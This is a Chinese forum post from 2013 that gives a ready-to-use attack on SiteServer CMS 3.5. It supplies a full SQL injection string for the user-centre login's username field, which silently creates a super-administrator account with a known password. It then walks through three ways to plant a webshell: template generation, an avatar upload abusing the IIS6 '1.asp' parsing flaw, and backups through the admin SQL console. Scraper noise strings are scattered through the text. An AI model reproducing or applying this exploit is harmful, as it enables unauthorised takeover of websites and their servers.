经测试秒杀最新的3.5版( w* M9 b. V, Z% I
stieserver官网:www.siteserver.cn$ f' Y+ A' e9 Y4 n# |
EXP:! B4 n, {6 Q% O0 G8 T4 r
直接访问UserCenter/login.aspx
, {9 s- ]* i5 T5 s; K' ?& Y% H/ z用户名处输入:0 @2 j$ A7 H, a: _
% A4 f4 S! N \, o* v o7 e
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
1 O- v, m2 z0 o8 _' x密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。% I/ a. s, m* o! X" _# l+ ]
之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 y9 W( d: \: i5 ~$ \6 a后台拿webshell的三种方法:2 H- T, v; o0 W+ H$ I
一、
% y. M: _/ A, n站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx4 B7 D9 P5 ?- g# Q/ f3 J
二、( ]/ ^6 e c( ]4 o& n) X& k
成员权限-》添加用户-》用户名为:1.asp+ \+ C! g5 t* k$ S
http://127.0.0.1/usercenter/
/ T( z5 E7 `% y$ ^/ I5 N用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
0 }, h1 i- t9 k$ h' f1 S5 Q5 C3 N# F(ps:后台添加用户时不会验证是否含有非法字符)! x7 h+ T! j" ^7 l- N) z
三、& U& V! ~ L' p% F2 b
系统工具-》实用工具-》机器参数查看% r$ s" p* h% O) K7 U
可以看到数据库类型、名称,WEB路径, f P5 v/ q' f& U. W% x5 {
系统工具-》数据库工具-》SQL语句查询
9 | d9 `& [5 o1 z' {: X这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对